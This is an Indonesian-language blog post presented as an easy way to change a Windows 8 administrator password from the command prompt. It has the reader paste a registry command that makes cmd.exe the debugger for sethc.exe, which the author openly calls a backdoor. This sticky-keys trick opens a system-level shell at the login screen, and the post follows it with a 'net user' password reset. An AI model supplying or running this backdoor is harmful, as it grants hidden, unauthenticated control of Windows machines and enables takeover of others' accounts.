Mengganti Password Administrator di Windows 8 Tanpa Ribet

Wah sudah lama ga nulis, ini abis iseng-iseng browsing-browsing nemu website bagus banget buat belajar oprek windows kalian.

Selama ini kan kita untuk mengganti password account kita sudah disediakan sama si Windows nya, buka sana buka sini edit. Kelamaan sekarang cukup buka Command Prompt tapi syaratnya harus dengan login administrator yah.

klik icon windows di keyboard kalian lalu ketikan CMD

find-cmd

atau yang lebih mudah klik tombol Shift 5x atau bisa juga kombinasi Alt-Shift-Prt Sc

cmd

Sumpah 2 cara diatas gw baru tau barusan.

Lanjut kita ke Topik awal, setelah CMD muncul jalankannya sebagai Administrator yah ( Icon CMD klik kanan run as Administrator)

 

klik-kanan-cmd

neh kode untuk bikin backdoor nya, biar kerjaan nya sukses. Copy trus Paste di Command Prompt kalian yo..

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

add-reg-cmd

Kalau sudah di Paste langsung keluar kata-kata sukses.

add-reg-cmd-success

Kalau mau di coba lagi nanti keluar seperti dibawah ini

add-reg-cmd-overwriteTinggal ketik Yes, beres.

Nah, udah 90% neh kerjaannya keliatannya panjang tapi padahal cuma gitu aja ini.

setelah itu langsung mulai dengan pergantian password nya, masih dengan pakai CMD ini. Perintahnya :

Net user user_name new_password —> ini untuk existing username seperti administrator or user biasa

Contohnya :

Net user administrator xxxx

cmd-edit-password

Sukses

cmd-edit-password-success

Berhasil.

Selamat mencoba yo..

Advertisements
By Alam Jaya Posted in Ngelmu

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s